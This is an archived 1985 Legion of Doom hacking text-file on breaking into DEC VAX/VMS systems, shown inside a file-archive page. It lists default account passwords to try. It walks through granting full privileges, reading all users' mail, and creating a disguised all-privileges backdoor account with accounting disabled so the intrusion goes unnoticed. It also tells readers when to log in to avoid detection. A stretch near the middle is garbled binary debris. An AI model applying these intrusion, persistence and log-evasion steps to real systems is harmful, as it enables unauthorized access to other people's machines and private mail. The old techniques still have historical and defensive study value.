home *** CD-ROM | disk | FTP | other *** search
/ SuperHack / SuperHack CD.bin / Hack / MISC / VMS1.ZIP / VMS1.TXT
Encoding:
Text File  |  1991-02-01  |  19.3 KB  |  519 lines

  1.  
  2.  
  3. $LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$
  4. L                                   L
  5. O            Lex Luthor             O
  6. D               and                 D
  7. $    The Legion Of Doom/Hackers     $
  8. L            Present:               L
  9. O       HACKING VAX'S VMS           O
  10. D                                   D
  11. $LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$
  12. L                                   L
  13. O This file will list most  default O
  14. D accounts/passwords,  commands for D
  15. $ non-privileged accts and commands $
  16. L for privileged accounts,  how  to L
  17. O set up your own acct,  list users O
  18. D and how to shut down the  system. D
  19. $                                   $
  20. LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$L
  21. O  (C)    WRITTEN 10-APR-85         O
  22. D  Written by:  LOD/H               D
  23. $LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$
  24.  
  25.  
  26. INTRODUCTION:
  27. -------------
  28.  
  29.    The VAX is made by DEC  (Digital Equipment Corp)  and can run a  variety  of
  30. operating systems.  In this file,  I will  talk about  the VMS  (Virtual Memory
  31. Operating System), VMS. The VAX is a 32 bit machine with 32 bit virtual address
  32. space.
  33.  
  34. ENTRANCE:
  35. ---------
  36.  
  37.    When you first connect with a VAX you type either  a return, a ctrl-c, or  a
  38. ctrl-y. It will then respond with something similar to:
  39.  
  40. LOD/H NETWORK COMMUNICATIONC|S RESEARCH SYSTEM VMS V4.0
  41.  
  42. Username:
  43. Password:
  44.  
  45.  
  46.    The most frequent way of  gaining access to a computer  system is by using a
  47. 'default' login/password. In this example you may try LOD as the username and
  48. RESEARCH as the  password or  a combination of words  in the opening banner (if
  49. there is one) which may allow you  access, otherwise you will  have to try  the
  50. DEFAULT METHOD of entry. The version listed above (V4.0) is the latest  version
  51. to my knowledge of VMS. The more widely used version that I have seen is V3.7.
  52.  
  53.    When DEC sells a VAX/VMS, the system comes equiped with 4 accounts which
  54. are:
  55.  
  56. DEFAULT -- This serves as a template in creating user records in the UAF  (User
  57. Authorization  File). A new user record is  assigned the values  of the DEFAULT
  58. record except where the system manager changes those values. The DEFAULT record
  59. can be modified but cannot be deleted from the UAF.
  60.  
  61. SYSTEM  --  Provides a means for the system manager to log in with full
  62. privileges. The SYSTEM record can be modified but cannot be deleted from the
  63. UAF.
  64.  
  65. FIELD -- Permits DIGITAL field service personnel to check out a new system. The
  66. FIELD record can be deleted once the system is installed.
  67.  
  68. SYSTEST -- Provides an appropriate environment for running the User Environment
  69. Test  Package  (UETP). The  SYSTEST record  can  be deleted  once the system is
  70. installed.
  71.  
  72.    Usually the SYSTEM MANAGER adds, deletes, and  modifies these records  which
  73. are in the UAF when the system arrives, thus eliminating the default passwords,
  74. but this is not true in all cases.
  75.  
  76.    The 'default' passwords that I have found to get me into a system are:
  77.  
  78. Username:    Password:
  79. ---------    ---------
  80. SYSTEM       MANAGER or OPERATOR
  81. FIELD        SERVICE or TEST
  82. DEFAULT      USER or DEFUALT
  83. SYSTEST      UETP or SYSTEST
  84.  
  85.    Other typical VMS accounts are:
  86.  
  87. VAX          VAX
  88. VMS          VMS
  89. DCL          DCL
  90. DEMO         DEMO
  91. TEST         TEST
  92. HELP         HELP
  93. NEWS         NEWS
  94. GUEST        GUEST
  95. GAMES        GAMES
  96. DECNET       DECNET
  97.  
  98.    Or a combination of the various  usernames and passwords.  If none of  these
  99. get you in, then you should move on to the next system unless you have a way to
  100. get usernames/passwords, like from trashing, stealing passwords directly, or by
  101. some other means.
  102.  
  103. YOUR IN!
  104. --------
  105.  
  106.    You will know that you are in by recieving the prompt of a dollar sign '$'.
  107. You will be popped into the default directory which is dependent on what
  108. account you are logged in as. If you get in as the system manager, you have
  109. full access if you get in on the field or systest accounts you may or may not
  110. have full access but you will have the privileges to give yourself full access.
  111. To  give privs to yourself:
  112.  
  113. $ SET PROCESS /PRIVS=ALL
  114.  
  115.    Once you have full privs, you can access any directory and any file, and
  116. also run the AUTHORIZE pgm which will be explained.
  117.  
  118.    The VMS system has full help files available by typing HELP. You can use the
  119. wildcard character of an '*' to list out info on every command:
  120.  
  121. $ HELP *
  122.  
  123.    When you first logon, it may be to your advantage to get a list of all users
  124. currently logged onto the system if there are any at all.  You can do this by:
  125.  
  126. $ SHOW USERS
  127.  
  128. VAX/VMS Interactive Users - Total = 4
  129.      01-MAY-1985 11:37:21.73
  130.  
  131. OPA0:         DEMO         004C004C
  132. TTD2:         LAWRENCL     0059004A
  133. TXB1:         FIELD        008D004E
  134. TXB3:         TWYLYSYS     01190057
  135.  
  136.  
  137.    It is highly recommended that if you are  logged on in the day and there are
  138. people logged in, especially the system manager or the account you are logged
  139. on as, logout and call back later. I have found that no matter what system you
  140. are on, the best way to remain undetected is to call when no one is on the
  141. system.
  142. You do not want to call too late since the system keeps a record of when each
  143. user logs in and out.
  144.  
  145.    To communicate with other users or other hackers that you are on the system
  146. with, use the PHONE Utility.
  147.  
  148. $ PHONE Username
  149.  
  150.  
  151.    If the system hac~DECm.Y].+9:!Q
  152. Y%1    1r=M"!I
  153. IeijRjR"%/"&#*UJU*X(H        )J )=U!Y5%1Q!MeMQ5]%11Q11e=UM=QI1=%9%91M%5A1eQeAi5)5)5%15)5)Q!%M]%11%9Y=-Q!Aersonal Mail Utility, you can use help from there.
  154.  
  155.    There are a lot of  commands and  many are not  too useful,  (to the  hacker
  156. anyway), so I will not go into detail.  One thing about VMS, there is plenty of
  157. on-line help available which  will enable  you to  learn the  operating  system
  158. fairly well.
  159.  
  160. DIRECTORIES:
  161. ------------
  162.  
  163.  
  164.    To see what you have in your directory type:
  165.  
  166. $ DIR
  167.  
  168.    To get a list of directories on the system type:
  169.  
  170. $ DIR <*.*>
  171.  
  172.    When a VAX/VMS is first installed, it comes with nine directories which  are
  173. not listed when you execute the DIR <*.*> command:
  174.  
  175. <SYSLIB>
  176.    This directory contains various macro and object libraries.
  177.  
  178. <SYSMSG>
  179.    This directory contains system message files.
  180.  
  181. <SYSMGR>
  182.    This directory contains files used in managing the operating system.
  183.  
  184. <SYSHLP>
  185.    This directory contains text files and help libraries for the HELP utility.
  186.  
  187. <SYSERR>
  188.    This is the directory for the error log file (ERRLOG.SYS).
  189.  
  190. <SYSTEST>
  191.    This directory contains files used in testing the functions of the operating
  192. system.
  193.  
  194. <SYSMAINT>
  195.    This diectory contains system diagnostic programs.
  196.  
  197. <SYSUPD>
  198.    This directory contains files used in applying system updates.
  199.  
  200. <SYSUPD.EXAMPLES>
  201.    This directory contains sample driver programs, user-written system
  202. services, and other source programs.
  203.  
  204. <SYSEXE>
  205.    This directory contains the executable images of most of the functions of
  206. the operating system.
  207.  
  208.    Inside these directories are files with the following file-types:
  209.  
  210.  
  211.  
  212.  
  213. File-type ! Description:     ! Command:
  214. ----------+------------------+-------------------------------------------------
  215.  .txt     ! Ascii text file  ! TYPE file-name
  216.  .hlp     ! System Help file ! TYPE file-name
  217.  .dat     ! Data file        ! TYPE file-name
  218.  .msg     ! Message file     ! TYPE file-name
  219.  .doc     ! Documentation    ! TYPE file-name
  220.  .log     ! Log file         ! TYPE file-name
  221.  .err     ! Error msg file   ! TYPE file-name
  222.  .seq     ! Sequential file  ! TYPE file-name
  223.  .sys     ! System file      ! FILE-NAME
  224.  .exe     ! Executable file  ! FILE-NAME
  225.  .com     ! Command file     ! COMMAND NAME
  226.  .bas     ! Basic file       ! RUN file-name
  227. ----------+------------------+-------------------------------------------------
  228.  
  229.    There are others but you won't see them as much as the above. You can change
  230. directories either  by using  the CHANGE  command or  by using the SET DEFAULT
  231. command:
  232.  
  233. $ CHANGE <DIR.NAM>
  234.                           or
  235. $ SET DEFAULT <DIR.NAM>
  236.  
  237.    You can now list and execute the files in this directory without first
  238. typing the directory name followed by the file name as long as you have
  239. sufficient access. If you don't have sufficient acces."~s you can still view files
  240. within directories that you cannot default to by:
  241.  
  242. $ TYPE <LOD.DIR>LOD.MAI;1
  243.  
  244.    This will list  the contents  of  the file  LOD.MAI;1  in the  directory  of
  245. <LOD.DIR>.
  246.  
  247.    The use of wildcards is very helpful when you desire to view, all the mail
  248. or something on a system. To list out all the users mail if you have access
  249. type:
  250.  
  251. $ TYPE <*.*>*.MAI;*
  252.  
  253.    As you may notice mail files have the extension of MAI at the end. The ;1 or
  254. ;2 etc.  are used to number files with the same name.
  255.  
  256. PRIVILEGES
  257. -----------
  258.  
  259.    Privileges fall into seven categories according to the damage that the user
  260. possessing them could cause the system:
  261.  
  262. None   - No privileges
  263. Normal - Minimum privileges to effectively use the system
  264. Group  - Potential to interfere with members of the same group
  265. Devour - Potential to devour noncritical system-wide resources
  266. System - Potential to interfere with normal system operation
  267. File   - Potential to compromise file security
  268. All    - Potential to control the system (hehe)
  269.  
  270.  
  271. THE UAF
  272. -------
  273.  
  274.    The User Authorization File contains the names of users who may log into the
  275. system and also contains a record of the user's privileges. Each record in the
  276. UAF includes the following:
  277.  
  278. 1. Name and Password
  279. 2. User Identification Code (UIC) -- Identifies a user by a group number and a
  280.    member number.
  281. 3. Default file specification -- Has the default device and directory names for
  282.    file access.
  283. 4. Login command file -- Names a command procedure to be executed automatically
  284.    at login time.
  285. 5. Login flags -- Allows the system manager to inhibit the use of the CTRL-Y
  286.    function, and lock user passwords.
  287. 6. Priority -- Specifies the base priority of the process created by the user
  288.    at login time.
  289. 7. Resources -- Limits the system resources the user may perform.
  290. 8. Privileges -- Limits activities the user may perform.
  291.  
  292.    If you have SYSTEM MANAGER privileges, you will be able to add, delete, and
  293. modify records in the UAF.
  294.  
  295.    The AUTHORIZE Utility allows you to modify the information in the UAF. It is
  296. usually found in the <SYSEXE> directory.  The commands for AUTHORIZE are: ADD
  297.  
  298. username <qualifier..>  Adds a record to the UAF
  299. EXIT (or CTRL-Z)            Returns you to command level
  300. HELP                        Lists the AUTHORIZE commands
  301. LIST <userspec> </FULL>     Creates a listing file of UAF records
  302. MODIFY username             Modifies a record
  303. REMOVE username             Deletes a record
  304. SHOW                        Displays UAF records
  305.  
  306.    The most useful besides ADD is the SHOW command. SHOW displays reports for
  307. selected UAF records.  You can get a /BRIEF listing or a /FULL listing.  But
  308. before you do that, you may want to make sure no one is logged on besides you.
  309. And to make sure no one can log on, you do this by:
  310.  
  311. $ SET LOGINS /INTERACTIVE=0
  312.  
  313.    This establishes the maximum number of users able to log in to the system,
  314. this command does not effect users currently logged on.  I never do the above
  315. since it is not really needed and looks very suspicious.  Now, to list out the
  316. userfile do the following:
  317.  
  318. $ SET DEFAULT <SYSEXE>
  319. $ RUN AUTHORIZE
  320. UAF> SHOW * /BRIEF
  321.  
  322. Owner           Username     UIC     Account  Privs  Priority  Default
  323. Directory
  324.  
  325. SYSTEM MANAGER  SYSTEM    <001,004>  SYSTEM   All       4      SYS$SYSROOT:
  326. FIELD SERVICE   FIELD     <001,010>  FIELD    All       4      SYS$SYSROOT:
  327.  
  328.    To get a full report:
  329.  
  330. (if you used the SET DEFAULT cmd earlier and the default dir is the <SYSEXE>
  331. directory, then you don't have to re-type it).
  332.  
  333. $ RUN AUTHORIZE (or if you still have the UAF> prompt):
  334. UAF> SHOW * /FULL
  335.  
  336. Username:  SYSTEM             Owner:  SYSTEM MANGER
  337. Account:   SYSTEM             UIC:    <001,004>
  338. CLI:       DCL                LGICMD:
  339. Default Device: SYS$ROOT:
  340. Default Directory: <SYSMGR>
  341. Login Flags:
  342. Primary days:   Mon Tue Wed Thu Fri
  343. Secondary days:                     Sat Sun
  344. No hourly restrictions
  345. PRIO:     4  BYTLM:         20480  BIOLM:            12
  346. PRCLM:   10  PBYTLM:            0  DIOLM:            12
  347. ASTLM:   20  WSDEFAULT:       150  FILLM:            20
  348. ENQLM:   20  WSQUOTA:         350  SHRFILLM:          0
  349. TQELM:   20  WSECTENT:       1024  CPU:        no limit
  350. MAXJOBS:  0  MAXACCTJOBS:       0  PGFLQUOTA:    200000
  351. Privileges:
  352.   CMKRNL CMEXEC SYSNAM GRPNAM ALLSPOOL DETACH DIAGNOSE LOG-IO GROUP ACNT PRMCEB
  353.   PRMMBX PSWAPM ALTPRI SETPRV TMPMBX WORLD OPER EXQUOTA NETMBX VOLPRO PHY-IO
  354.   BUGCHK PRMGBL SYSGBL MOUNT  PFNMAP SHMEM SYSPRV SYSCLK
  355.  
  356. UAF>
  357.  
  358.    Unfortunately, you cannot get a listing of passwords though you can get the
  359. list of users as shown above.  The passwords are encrypted just like a UNIX
  360. system, but you cannot even see the encrypted password unless you look at the
  361. actual file that the UAF> draws it's information from.
  362.  
  363.    After listing out all the users, you figure that since all these other
  364. people are on here, why can't I have my own account? Well, if you have
  365. sufficient privs, you can!
  366.  
  367. UAF>ADD SYSLOG /PASSWORD=LEGION /UIC=<014,006> /CPUTIME=0 /DEVICE=SYS$SYSROOT-
  368. -/ACCOUNT=VMS /DIRECTORY=<SYSERR> /PRIVS=ALL /OWNER=DIGITAL /NOACCOUNTING
  369.  
  370.  
  371. 1) You ADD the username SYSLOG (you do not want to create a user like: Lex,
  372.    since it will be too obvious and not look right.  I have had much success in
  373.    not being detected with this acct.
  374. 2) You specify the password for the SYSLOG account.
  375. 3) You assign a UIC (User Ident Code) which consists of two numbers in the
  376.    range of 0 through 377, separated by a comma and enclosed in brackets. The
  377.    system assigns a UIC to a detached process created for the user at login
  378.    time. User processes pass on this UIC to any subprocesses they create.
  379.    Processes can further assign UICs to files, mailboxes, devices, etc. You can
  380.    assign the same UIC to more than 1 user.
  381. 4) CPUTIME is in delta format, 0 means INFINITE, which is what we will use.
  382. 5) You specify the DEVICE that is allocated to the user when they login, which
  383.    for our purposes, is the SYS$SYSROOT device, other devices are: SYS$DEVICE,
  384.    SYS$SYSDISK, DB1, etc.
  385. 6) Specifying an account is not necessary, but if you do, use one that is
  386.    listed as another users', since you don't want to attract too much attention
  387.    to the account.
  388. 7) The default directory can be a directory currently on the system or it can
  389.    be created after the UAF record is added. You may want to use one of the
  390.    ones mentioned earlier in the file, but be sure not to use the <SYSMGR>
  391.    directory.
  392. 8) You can select one of the privileges listed earlier in this file, we will
  393.    use, of course, ALL.
  394. 9) OWNER is similar to the ACCOUNT qualifier, again, look at what the other
  395.    users have listed.
  396. 10)NOACCOUNTING will disable system accounting records, thus, not adding
  397.    information to the ACCOUNTING.DAT file.
  398.  
  399.  
  400.    After the UAF record is successfully added, you should create a directory by
  401. specifying the device name, directory name, and UIC of the UAF record.
  402. Protection for the "ordinary" user is normally, Read, Write, Execute, and
  403. Delete access for system, owner, and group processes, and read and execute
  404. access for world processes. To create a directory:
  405.  
  406. $ CREATE SYS$SYSROOT:<SYSLOG> /DIRECTORY /OWNER-UIC=<014,006>
  407.  
  408.  
  409. ACCOUNTING:
  410. -----------
  411.  
  412.    For accounting purposes, the VAX/VMS system keeps records of the use of the
  413. system resources.  These records are kept in the accounting log file:
  414. SYS$SYSDISK:<SYSMGR>ACCOUNTING.DAT, which is updated each time an accountable
  415. process terminates, each time a print job is completed and each time a login
  416. failure occurs.  In addition, users can send messages to be inserted into the
  417. accounting log file.
  418.  
  419. To surpress the accounting function and thus avoid accounting for the use of
  420. system resources requires privilege.  The /NOACCOUNTING qualifier is used to
  421. disable all accounting in a created process.
  422.  
  423.    You may want to see how often the account you are using or another account
  424. logs in, you can do this by:
  425.  
  426. $ ACCOUNTING /USER=(SYSLOG)
  427.  
  428.   Date / Time         Type     Subtype      Username  ID        Source  Status
  429. ------------------------------------------------------------------------------
  430. 30-JAN-1985 00:20:56  PROCESS  INTERACTIVE  SYSLOG    000000C5  NONE   
  431. 00038090
  432. 12-FEB-1985 04:11:34  PROCESS  INTERACTIVE  SYSLOG    000000A9  NONE   
  433. 00038110
  434. 01-MAY-1985 10:40:22  PROCESS  INTERACTIVE  SYSLOG    000000C4  NONE   
  435. 00030001
  436.  
  437.    This is the accounting information for the user:SYSLOG which shows that the
  438. user has logged on three times so far.  Some users may be on hundreds of times,
  439. thus, it would be an ideal account to use/abuse since it will not be likely
  440. that
  441. the unauthorize accesses will be detected.
  442.  
  443. LOGGING OFF:
  444. ------------
  445.  
  446.    Simply type:
  447.  
  448. $ LOGOUT
  449.  
  450.    The system will display the usual CPU time used and other statistics.
  451.  
  452. SHUTTING DOWN THE SYSTEM:
  453. -------------------------
  454.  
  455.    Many files I have read tell you how to destroy a system, shut it down etc. I
  456. do not recommend nor practice any type of malicious activities.  Though, I do
  457. realize that in the process of gaining access to a system, the Hacker or System
  458. Cracker which ever you prefer, gets bored or learns as much as he wants to
  459. learn about the system. I will explain how to shutdown the system correctly,
  460. this can be used in case you think you screwed the system and shutting down the
  461. system may be the only way to avoid considerable damage.
  462.  
  463.    The normal reasons for shutting down the system are: danger of power loss,
  464. need to backup the system disk, hardware or software problems, or to use the
  465. system for a specific application.  Below is the command procedure which
  466. describes how to shut down the system in an orderly fashion.  This procedure is
  467. contained in a command file.
  468.  
  469. PROCEDURE:
  470.  
  471. 1) Type the following command to begin the shutdown procedure:
  472.  
  473.    $ @SYS$SYSTEM:SHUTDOWN
  474.  
  475. 2) Enter time till shutdown:
  476.  
  477.    How many minutes until shutdown?:5
  478.  
  479. 3) You will now have to give the reason for shutting it down:
  480.  
  481.    Reason?:possible system damage
  482.  
  483. 4) Respond to typing a Y or N to the following question:
  484.  
  485.    Do you want to spin down the disks?:N
  486.  
  487. After a short period the message:
  488.  
  489. SYSTEM SHUTDOWN COMPLETE - USE CONSOLE TO HALT SYSTEM
  490.  
  491. At this point, the system cannot be totally shut down, but all processes are
  492. halted, thus, not causing any further damage to the system. (remember the
  493. reason you should have shut it down was because potential damage to the system
  494. could have occured and you were acting in the best interest of the system) yeah
  495. sure.
  496.  
  497. READING MATERIAL:
  498. -----------------
  499.  
  500.    For general background information about the VAX/VMS system, see the VAX/VMS
  501. Primer and the VAX/VMS Summary Description and Glossary.  The following VAX/VMS
  502. documents may also be useful:
  503.  
  504.  o VAX/VMS Command Language User's Guide
  505.  o VAX/VMS Guide to Using Command Procedures
  506.  o VAX/VMS Release notes
  507.  o VAX-11  RSX-11M User's Guide
  508.  o VAX-11  Software Installation Guide
  509.  o VAX/VMS System Manager's Guide
  510.  o VAX/VMS System Messages and Recovery Procedures Manual
  511.  o VAX-11  Utilities Reference Manual
  512.  o RMS-11  User's Guide
  513.  
  514.    For controlling network operations, refer to the DECNET-VAX System Manager's
  515. Guide.
  516.  
  517. Lex Luthor
  518. Legion Of Hackers!
  519.